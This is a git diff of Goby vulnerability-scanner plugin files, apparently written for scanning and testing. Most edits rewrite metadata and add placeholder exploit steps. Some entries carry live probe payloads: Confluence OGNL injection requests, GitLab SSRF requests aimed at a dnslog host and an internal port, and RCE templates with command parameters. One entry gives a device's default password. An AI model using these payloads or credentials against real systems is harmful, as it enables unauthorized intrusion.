+ "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/pages/templates2/viewpagetemplate.action", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/pages/createpage-entervariables.action", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/template/custom/content-editor", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/templates/editor-preload-container", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/users/user-dark-features", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] } ], "ExploitSteps": [ @@ -74,7 +483,7 @@ { "Request": { "method": "POST", - "uri": "/pages/createpage-entervariables.action?SpaceKey=x", + "uri": "{{{Path}}}", "follow_redirect": true, "header": { "Content-Type": "application/x-www-form-urlencoded" @@ -101,6 +510,6 @@ ] } ], - "PostTime": "2021-09-03 11:27:04", - "GobyVersion": "1.8.300" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Cacti_Weathermap_File_Write.json b/json/Cacti_Weathermap_File_Write.json index b3c1e1d..440107e 100644 --- a/json/Cacti_Weathermap_File_Write.json +++ b/json/Cacti_Weathermap_File_Write.json @@ -4,12 +4,12 @@ "Tags": [ "getshell" ], - "GobyQuery": "(app=\"cacti-监控系统\"|title=\"Login to Cacti\"|app=\"Cactiez\")", - "Description": "allows remote attackers to upload and execute arbitrary files", - "Product": "cacti-监控系统", + "GobyQuery": "app=\"cacti-监控系统\" || title=\"Login to Cacti\" || app=\"Cactiez\"", + "Description": "Cacti provides a robust and extensible operational monitoring and fault management framework for users around the world. Is also a complete network graphing solution designed to harness the power of RRDTool's data storage and graphing functionality.", + "Product": "cacti", "Homepage": "https://www.cacti.net/", - "Author": "aetkrad", - "Impact": "

Remote attacker can use to replace web application files with malicious code and perform remote code execution on the system.

", + "Author": "", + "Impact": "Remote attacker can use to replace web application files with malicious code and perform remote code execution on the system.", "Recommendation": "", "References": [], "HasExp": true, @@ -121,6 +121,6 @@ ] } ], - "PostTime": "2021-11-05 13:30:24", - "GobyVersion": "1.8.302" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/ClickHouse_SQLI.json b/json/ClickHouse_SQLI.json index 75659fa..820cef1 100644 --- a/json/ClickHouse_SQLI.json +++ b/json/ClickHouse_SQLI.json @@ -4,17 +4,17 @@ "Tags": [ "sqli" ], - "GobyQuery": "(banner=\"X-Clickhouse-Summary\" | port=\"8123\")", - "Description": "ClickHouse 存在着的接口由于没有鉴权,则任意访问者都可以执行SQL语句获取数据.", + "GobyQuery": "banner=\"X-Clickhouse-Summary\" || port=\"8123\"", + "Description": "ClickHouse is an open-source column-oriented DBMS for online analytical processing that allows users to generate analytical reports using SQL queries in real-time.", "Product": "ClickHouse", - "Homepage": "https://gobies.org/", - "Author": "aetkrad", - "Impact": "", + "Homepage": "https://clickhouse.com/", + "Author": "", + "Impact": "Clickhouse has unauthorized access and can perform SQL statements to get data.", "Recommendation": "", "References": [ "https://mp.weixin.qq.com/s/xIc3Ic7N104iTogZul1LJA" ], - "HasExp": false, + "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", @@ -98,6 +98,43 @@ ] } ], - "PostTime": "2021-12-04 18:32:14", - "GobyVersion": "1.9.310" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Consul_Rexec_RCE.json b/json/Consul_Rexec_RCE.json index 0eadbad..583669b 100644 --- a/json/Consul_Rexec_RCE.json +++ b/json/Consul_Rexec_RCE.json @@ -5,16 +5,16 @@ "rce" ], "GobyQuery": "protocol=\"consul(http)\"", - "Description": "Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request", + "Description": "Consul is the control plane of the service mesh. Consul is a multi-networking tool that offers a fully-featured service mesh solution that solves the networking and security challenges of operating microservices and cloud infrastructure.", "Product": "Consul", "Homepage": "https://www.consul.io/", - "Author": "aetkrad", - "Impact": "", + "Author": "", + "Impact": "Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request.", "Recommendation": "", "References": [ "https://www.exploit-db.com/exploits/46073" ], - "HasExp": false, + "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", @@ -57,6 +57,43 @@ ] } ], - "PostTime": "2021-11-08 21:46:25", - "GobyVersion": "1.8.302" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Datang_AC_Default_Password.json b/json/Datang_AC_Default_Password.json index f000998..bd556a8 100644 --- a/json/Datang_AC_Default_Password.json +++ b/json/Datang_AC_Default_Password.json @@ -4,12 +4,12 @@ "Tags": [ "defaultaccount" ], - "GobyQuery": "(app=\"大唐电信AC集中管理平台\" | title=\"大唐电信AC集中管理平台\")", - "Description": "大唐AC集中管理平台默认密码admin/123456", - "Product": "大唐电信AC集中管理平台", + "GobyQuery": "app=\"大唐电信AC集中管理平台\" || title=\"大唐电信AC集中管理平台\"", + "Description": "", + "Product": "Datang Telecom AC centralized management platform", "Homepage": "http://www.datang.com/", - "Author": "aetkrad", - "Impact": "", + "Author": "", + "Impact": "Datang AC centralized management platform default password admin/123456", "Recommendation": "", "References": [], "HasExp": true, @@ -99,6 +99,6 @@ ] } ], - "PostTime": "2021-11-12 19:44:34", - "GobyVersion": "1.8.302" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/DedeCMS_Carbuyaction_FileInclude.json b/json/DedeCMS_Carbuyaction_FileInclude.json index 55e1620..91c6c7d 100644 --- a/json/DedeCMS_Carbuyaction_FileInclude.json +++ b/json/DedeCMS_Carbuyaction_FileInclude.json @@ -5,16 +5,16 @@ "FileInclude" ], "GobyQuery": "app=\"DedeCMS\"", - "Description": "DedeCMS Carbuyaction.php页面存在本地文件包含漏洞", + "Description": "Dream Weaving (DedeCMS) Official Website- Content Management System- Shanghai Zhuozhuo Network Technology Co., Ltd.", "Product": "DedeCMS", "Homepage": "http://www.dedecms.com/", - "Author": "aetkrad", - "Impact": "", + "Author": "", + "Impact": "DedeCMS Carbuyaction.php has a local file inclusion vulnerability.", "Recommendation": "", "References": [ "https://www.cnblogs.com/milantgh/p/3615986.html" ], - "HasExp": false, + "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", @@ -88,6 +88,43 @@ ] } ], - "PostTime": "2021-11-13 14:18:50", - "GobyVersion": "1.8.302" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Discuz_RCE_WOOYUN_2010_080723.json b/json/Discuz_RCE_WOOYUN_2010_080723.json index e9482de..fbccd94 100644 --- a/json/Discuz_RCE_WOOYUN_2010_080723.json +++ b/json/Discuz_RCE_WOOYUN_2010_080723.json @@ -4,17 +4,17 @@ "Tags": [ "rce" ], - "GobyQuery": "(app=\"Discuz\" | body=\"Powered by Discuz!\")", - "Description": "由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。", - "Product": "discuz", + "GobyQuery": "app=\"Discuz\" || body=\"Powered by Discuz!\"", + "Description": "Discuz! is Internet forum software written in PHP and developed by Comsenz Technology Co., Ltd. It supports MySQL and PostgreSQL databases.", + "Product": "Discuz!", "Homepage": "https://www.discuz.net/", - "Author": "aetkrad", - "Impact": "", + "Author": "", + "Impact": "Since the default value of request_order in the php.ini setting in php5.3.x version is GP, $_COOKIE is no longer included in $_REQUEST. We overwrite the global variable by passing in $GLOBALS in the cookie, resulting in a code execution vulnerability.", "Recommendation": "", "References": [ "https://github.com/vulhub/vulhub/tree/master/discuz/wooyun-2010-080723" ], - "HasExp": false, + "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", @@ -66,6 +66,43 @@ ] } ], - "PostTime": "2021-11-17 13:57:54", - "GobyVersion": "1.8.302" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Discuz_Wechat_Plugins_Unauth.json b/json/Discuz_Wechat_Plugins_Unauth.json index b0fe422..2574f35 100644 --- a/json/Discuz_Wechat_Plugins_Unauth.json +++ b/json/Discuz_Wechat_Plugins_Unauth.json @@ -4,17 +4,17 @@ "Tags": [ "unauth" ], - "GobyQuery": "(app=\"Discuz\" | body=\"Powered by Discuz!\")", - "Description": "由Discuz论坛官方微信登录插件产生,攻击者可以利用该插件的漏洞绕过论坛的邮箱、手机号等各种验证非法创建论坛账号,通过该漏洞创建的论坛账号具备一般用户的所有权限,可以任意发帖回帖.", - "Product": "discuz", + "GobyQuery": "app=\"Discuz\" || body=\"Powered by Discuz!\"", + "Description": "Discuz! is Internet forum software written in PHP and developed by Comsenz Technology Co., Ltd. It supports MySQL and PostgreSQL databases.", + "Product": "Discuz!", "Homepage": "https://www.discuz.net/", - "Author": "aetkrad", - "Impact": "", + "Author": "", + "Impact": "Generated by the official WeChat login plug-in of Discuz Forum, attackers can use the vulnerability of this plug-in to bypass the forum's mailbox, mobile phone number and other verifications to illegally create a forum account. The forum account created through this vulnerability has all the permissions of ordinary users and can be arbitrarily Post a reply.", "Recommendation": "", "References": [ "https://gitee.com/ComsenzDiscuz/DiscuzX/issues/IPRUI" ], - "HasExp": false, + "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", @@ -78,6 +78,43 @@ ] } ], - "PostTime": "2021-11-17 13:52:51", - "GobyVersion": "1.8.302" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Discuz_v72_SQLI.json b/json/Discuz_v72_SQLI.json index 853794d..a98fd2f 100644 --- a/json/Discuz_v72_SQLI.json +++ b/json/Discuz_v72_SQLI.json @@ -4,17 +4,17 @@ "Tags": [ "sqli" ], - "GobyQuery": "(app=\"Discuz\" | body=\"Powered by Discuz!\")", - "Description": "discuz7.2论坛存在sql注入漏洞", - "Product": "Discuz", + "GobyQuery": "app=\"Discuz\" || body=\"Powered by Discuz!\"", + "Description": "Discuz! is Internet forum software written in PHP and developed by Comsenz Technology Co., Ltd. It supports MySQL and PostgreSQL databases.", + "Product": "Discuz!", "Homepage": "https://www.discuz.net/", - "Author": "aetkrad", - "Impact": "", + "Author": "", + "Impact": "Discuz7.2 has sql injection vulnerability.", "Recommendation": "", "References": [ "https://blog.csdn.net/weixin_40709439/article/details/82780606" ], - "HasExp": false, + "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", @@ -64,6 +64,43 @@ ] } ], - "PostTime": "2021-11-16 17:48:16", - "GobyVersion": "1.8.302" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Docker_Registry_API_Unauth.json b/json/Docker_Registry_API_Unauth.json index c5df064..452783f 100644 --- a/json/Docker_Registry_API_Unauth.json +++ b/json/Docker_Registry_API_Unauth.json @@ -1,20 +1,20 @@ { "Name": "Docker Registry API Unauth", - "Level": "2", + "Level": "1", "Tags": [ "unauth" ], "GobyQuery": "header=\"registry/2.0\"", - "Description": "Docker Registry API 存在未授权访问漏洞,黑客可通过API下载docker images,导致敏感信息泄露。", + "Description": "Docker is a set of platform as a service products that use OS-level virtualization to deliver software in packages called containers.", "Product": "Docker Registry", "Homepage": "https://docs.docker.com/registry/", - "Author": "aetkrad", - "Impact": "", + "Author": "", + "Impact": "There is an unauthorized access vulnerability in the Docker Registry API. Docker images can be downloaded through the API, resulting in the disclosure of sensitive information.", "Recommendation": "", "References": [ "https://www.freeaihub.com/post/6085.html" ], - "HasExp": false, + "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", @@ -98,6 +98,43 @@ ] } ], - "PostTime": "2021-11-27 14:21:33", - "GobyVersion": "1.9.310" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Fastmeeting_Arbitrary_File_Read.json b/json/Fastmeeting_Arbitrary_File_Read.json index 1605698..6406411 100644 --- a/json/Fastmeeting_Arbitrary_File_Read.json +++ b/json/Fastmeeting_Arbitrary_File_Read.json @@ -1,15 +1,15 @@ { - "Name": "好视通云会议存在任意文件读取漏洞", + "Name": "Fastmeeting Arbitrary File Read", "Level": "2", "Tags": [ "fileread" ], "GobyQuery": "body=\"深圳银澎云计算有限公司\"", - "Description": "好视通云会议存在任意文件读取漏洞", - "Product": "好视通云会议", + "Description": "hst", + "Product": "hst", "Homepage": "https://www.hst.com/", - "Author": "aetkrad", - "Impact": "", + "Author": "", + "Impact": "Fastmeeting Arbitrary File Read", "Recommendation": "", "References": [ "https://mp.weixin.qq.com/s/fMNE1PF5n81O1BpoDRlYkA" @@ -100,6 +100,6 @@ ] } ], - "PostTime": "2021-12-11 14:50:39", - "GobyVersion": "1.9.310" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/FineReport_v9_Arbitrary_File_Overwrite.json b/json/FineReport_v9_Arbitrary_File_Overwrite.json index 1e72124..56a369b 100644 --- a/json/FineReport_v9_Arbitrary_File_Overwrite.json +++ b/json/FineReport_v9_Arbitrary_File_Overwrite.json @@ -5,16 +5,16 @@ "overwrite" ], "GobyQuery": "app=\"fanruansem-FineReport\"", - "Description": "由于在初始化svg文件时,未对传入的参数做限制,导致可以对已存在的文件覆盖写入数据,从而通过将木马写入jsp文件中获取服务器权限", - "Product": "帆软-FineReport", + "Description": "FineReport is an web reporting tool.", + "Product": "fanruan-FineReport", "Homepage": "https://www.fanruan.com/", - "Author": "aetkrad", - "Impact": "", + "Author": "", + "Impact": "Since there is no restriction on the incoming parameters when initializing the svg file, data can be overwritten to the existing file, so that the server permission can be obtained by writing the Trojan into the jsp file.", "Recommendation": "", "References": [ "https://github.com/NHPT/WebReportV9Exp/blob/main/WebReport_Exp.py" ], - "HasExp": false, + "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", @@ -88,6 +88,43 @@ ] } ], - "PostTime": "2021-12-08 11:22:44", - "GobyVersion": "1.9.310" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/GitLab_SSRF_CVE_2021_22214.json b/json/GitLab_SSRF_CVE_2021_22214.json index 286fa3b..53e0dc4 100644 --- a/json/GitLab_SSRF_CVE_2021_22214.json +++ b/json/GitLab_SSRF_CVE_2021_22214.json @@ -1,26 +1,35 @@ { "Name": "GitLab SSRF CVE-2021-22214", "Level": "3", - "Tags": [], - "GobyQuery": "app=\"GitLab\"", - "Description": "GitLab存在前台未授权SSRF漏洞,未授权的攻击者也可以利用该漏洞执行SSRF攻击(CVE-2021-22214)。该漏洞源于对用户提供数据的验证不足,远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。", - "Product": "Gitlab > 10.5", - "Homepage": "https://gobies.org/", - "Author": "luckying", - "Impact": "", - "Recommandation": "", - "References": [ - "https://gobies.org/" + "Tags": [ + "SSRF" ], - "HasExp": true, - "ExpParams": [ - { - "name": "URL", - "type": "input", - "value": "test.dnslog.cn", - "show": "" - } - ], + "GobyQuery": "app=\"GitLab\"", + "Description": "GitLab is The DevOps Platform.", + "Product": "GitLab", + "Homepage": "https://about.gitlab.com/", + "Author": "", + "Impact": "When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited.", + "Recommendation": "", + "References": [ + "https://nvd.nist.gov/vuln/detail/CVE-2021-22214", + "https://nvd.nist.gov/vuln/detail/CVE-2021-39935", + "https://nvd.nist.gov/vuln/detail/CVE-2021-22175", + "https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html", + "https://docs.gitlab.com/ee/api/lint.html" + ], + "HasExp": true, + "ExpParams": [ + { + "Name": "URL", + "Type": "input", + "Value": "test.dnslog.cn" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -30,8 +39,7 @@ "follow_redirect": false, "header": { "Content-Type": "application/json", - "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", - "Content-Length": "" + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" }, "data_type": "text", "data": "{\"include_merged_yaml\":true,\"content\":\"include:\\n remote: http://test.dnslog.cn/api/v1/targets?test.yml\",\"wglt1cskpv\":\"=\"}" @@ -57,9 +65,45 @@ ] }, "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/api/v4/ci/lint?include_merged_yaml=true", + "follow_redirect": true, + "header": { + "Content-Type": "application/json" + }, + "data_type": "text", + "data": "{\"content\": \"include:\\n remote: http://127.0.0.1:9100/test.yml\"}", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "does not have valid YAML syntax", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] } ], - "ExploitSteps": [ + "ExploitSteps": [ "AND", { "Request": { @@ -68,8 +112,7 @@ "follow_redirect": false, "header": { "Content-Type": "application/json", - "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", - "Content-Length": "" + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" }, "data_type": "text", "data": "{\"include_merged_yaml\":true,\"content\":\"include:\\n remote: http://{{{URL}}}/api/v1/targets?test.yml\",\"wglt1cskpv\":\"=\"}" @@ -95,10 +138,10 @@ ] }, "SetVariable": [ - "output|lastbody" - ] + "output|lastbody|undefined|undefined" + ] } ], - "PostTime": "2021-07-01 20:34:22", - "GobyVersion": "1.8.268" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/H3C_IMC_RCE.json b/json/H3C_IMC_RCE.json index 6f4447d..98e6f40 100644 --- a/json/H3C_IMC_RCE.json +++ b/json/H3C_IMC_RCE.json @@ -1,26 +1,32 @@ { - "Name": "H3C IMC远程命令执行", + "Name": "H3C IMC RCE", "Level": "3", - "Tags": [], + "Tags": [ + "rce" + ], "GobyQuery": "product=\"H3C-iMC\"", - "Description": "", - "Product": "H3C iMC 智能管理中心平台", + "Description": "H3C IMC", + "Product": "H3C IMC", "Homepage": "http://www.h3c.com/cn/Products___Technology/Products/H3C_Soft/IT_Business/Resource/iMC_Flat", - "Author": "ying", - "Impact": "", - "Recommandation": "", + "Author": "", + "Impact": "A vulnerability in H3C IMC allows remote unauthenticated attackers to cause the remote web application to execute arbitrary commands via the 'dynamiccontent.properties.xhtml' endpoint.", + "Recommendation": "", "References": [ + "https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIw", "https://www.t00ls.net/articles-60979.html" ], - "HasExp": true, - "ExpParams": [ - { - "name": "Cmd", - "type": "input", - "value": "whoami", - "show": "" - } - ], + "HasExp": true, + "ExpParams": [ + { + "Name": "Cmd", + "Type": "input", + "Value": "whoami" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -57,8 +63,8 @@ }, "SetVariable": [] } - ], - "ExploitSteps": [ + ], + "ExploitSteps": [ "AND", { "Request": { @@ -93,10 +99,10 @@ ] }, "SetVariable": [ - "output|lastbody" - ] + "output|lastbody|undefined|undefined" + ] } - ], - "PostTime": "2021-05-28 10:06:39", - "GobyVersion": "1.8.268" + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/IRDM4000_Smart_station_Unauthorized_access.json b/json/IRDM4000_Smart_station_Unauthorized_access.json index 732a316..09c218d 100644 --- a/json/IRDM4000_Smart_station_Unauthorized_access.json +++ b/json/IRDM4000_Smart_station_Unauthorized_access.json @@ -1,18 +1,18 @@ { "Name": "IRDM4000 Smart station Unauthorized access", "Level": "2", - "Tags": [], - "GobyQuery": "body=\"iRDM4000智慧站房在线监管\"", - "Description": "IRDM4000 unauthorized access vulnerability of userId=0", - "Product": "IRDM4000 Smart station", - "Homepage": "http://www.houtian-hb.com", - "Author": "gobysec@gmail.com", - "Impact": "", - "Recommendation": "", - "References": [ - "https://gobies.org/" + "Tags": [ + "unauthorized access" ], - "HasExp": true, + "GobyQuery": "body=\"iRDM4000智慧站房在线监管\"", + "Description": "IRDM4000 Smart station", + "Product": "IRDM4000 Smart station", + "Homepage": "http://www.houtian-hb.com/", + "Author": "", + "Impact": "IRDM4000 unauthorized access vulnerability of userId=0", + "Recommendation": "", + "References": [], + "HasExp": false, "ExpParams": null, "ExpTips": { "Type": "", @@ -64,43 +64,6 @@ ] } ], - "ExploitSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "/test.php", - "follow_redirect": true, - "header": null, - "data_type": "text", - "data": "", - "set_variable": [] - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "test", - "bz": "" - } - ] - }, - "SetVariable": [ - "output|lastbody|regex|" - ] - } - ], - "PostTime": "2021-10-26 10:55:38", - "GobyVersion": "1.9.304" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/IceWarp_WebClient_basic_RCE.json b/json/IceWarp_WebClient_basic_RCE.json index def811a..ce82ebb 100644 --- a/json/IceWarp_WebClient_basic_RCE.json +++ b/json/IceWarp_WebClient_basic_RCE.json @@ -1,26 +1,31 @@ { "Name": "IceWarp WebClient basic RCE", "Level": "3", - "Tags": [], - "GobyQuery": "body=\"Powered by IceWarp\"", - "Description": "", - "Product": "", - "Homepage": "https://gobies.org/", - "Author": "luckying", - "Impact": "", - "Recommandation": "", - "References": [ - "https://gobies.org/" + "Tags": [ + "rce" ], - "HasExp": true, - "ExpParams": [ - { - "name": "cmd", - "type": "input", - "value": "ipconfig", - "show": "" - } - ], + "GobyQuery": "body=\"Powered by IceWarp\"", + "Description": "IceWarp", + "Product": "IceWarp", + "Homepage": "http://www.icewarp.cn/", + "Author": "", + "Impact": "IceWarp WebClient basic RCE", + "Recommendation": "", + "References": [ + 